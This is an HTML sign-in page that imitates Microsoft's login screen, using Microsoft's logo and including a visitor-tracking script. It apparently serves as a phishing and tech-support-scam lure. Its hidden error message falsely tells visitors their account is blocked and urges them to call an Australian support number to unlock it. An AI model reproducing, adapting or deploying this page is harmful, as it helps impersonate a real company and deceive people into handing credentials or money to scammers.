<!DOCTYPE html>
<html lang="en">
  <head>
	  <script type="text/javascript">
    (function(c,l,a,r,i,t,y){
        c[a]=c[a]||function(){(c[a].q=c[a].q||[]).push(arguments)};
        t=l.createElement(r);t.async=1;t.src="https://www.clarity.ms/tag/"+i;
        y=l.getElementsByTagName(r)[0];y.parentNode.insertBefore(t,y);
    })(window, document, "clarity", "script", "qj6d65zha1");
</script>
    <meta charset="UTF-8" />
    <meta name="viewport" content="width=device-width, initial-scale=1.0" />
    <title>Sign In</title>
    <style>
      body {
        margin: 0;
        font-family: Arial, sans-serif;
        display: flex;
        justify-content: center;
        flex-direction: column;
        align-items: center;
        height: 100vh;
        background: linear-gradient(135deg, #f0f4f7, #e1eaf0);
      }
      .outer-div img {
        margin-bottom: 2rem;
      }
      .outer-div img {
        width: 200px;
      }
      .login-container {
        background: #fff;
        padding: 30px;
        box-shadow: 0 2px 10px rgba(0, 0, 0, 0.1);
        text-align: left;
        max-width: 400px;
        width: 100%;
      }

      .login-container h1 {
        font-size: 24px;
        margin-bottom: 20px;
      }

      .login-container img {
        width: 120px;
      }

      .input-group {
        margin-bottom: 15px;
        text-align: left;
      }

      .input-group label {
        display: block;
        font-size: 14px;
        margin-bottom: 5px;
      }

      .input-group input {
        width: 100%;
        padding: 10px 0;
        font-size: 14px;
        border: none;
        border-bottom: 1px solid #5e5e5e;
      }

      .input-group input:focus {
        outline: none;
        border-color: #0078d4;
      }
      .submit-btn-cont {
        display: flex;
        justify-content: right;
      }
      .submit-btn {
        background-color: #0067b8;
        color: white;
        padding: 8px 12px;
        border: none;
        font-size: 15px;
        cursor: pointer;
        width: 30%;
      }

      .submit-btn:hover {
        background-color: #005fa1;
      }

      .sign-in-options {
        margin-top: 20px;
        display: flex;
        justify-content: center;
      }

      .sign-in-options p {
        text-decoration: none;
        color: #0078d4;
        font-size: 14px;
      }

      .create-account {
        margin-top: 15px;
      }

      .create-account p {
        text-decoration: none;
        color: #0078d4;
        font-size: 14px;
      }
    </style>
  </head>
  <body>
    <div class="outer-div">
      <img
       
      />
    </div>
    <div class="login-container">
      <img
        src="https://logincdn.msauth.net/shared/5/images/microsoft_logo_ee5c8d9fb6248c938fd0.svg"
        alt="Microsoft Logo"
      />
      <h1>Sign in</h1>
      <form id="login-form">
        <div class="input-group">
          <label for="email">Email</label>
          <input
            type="email"
            id="email"
            placeholder="Enter your email"
            required
          />
        </div>
        <div class="input-group">
          <label for="password">Password</label>
          <input
            type="password"
            id="password"
            placeholder="Enter your password"
            required
          />
        </div>
        <div
          id="error-message"
          style="
            color: #a94442;
            background-color: #f2dede;
            border: 1px solid #ebccd1;
            padding: 10px;
            margin: 8px 0;
            text-align: center;
            border-radius: 4px;
            display: none;
          "
        >
          Yours Account access has been blocked due to suspicious login attempt.
          Contact our customer support at
          <a
            href="tel:+611800959905"
            style="color: blue; text-decoration: underline"
            >+61 1800 959 905</a
          >.to verify and unlock your account.
        </div>
        <div class="submit-btn-cont">
          <button type="submit" class="submit-btn">Sign In</button>
        </div>
      </form>
      <div class="create-account">
        <p>No account? Create one!</p>
      </div>
      <div class="sign-in-options">
        <p>Sign-in options</p>
      </div>
    </div>
  
  </body>
</html>
						
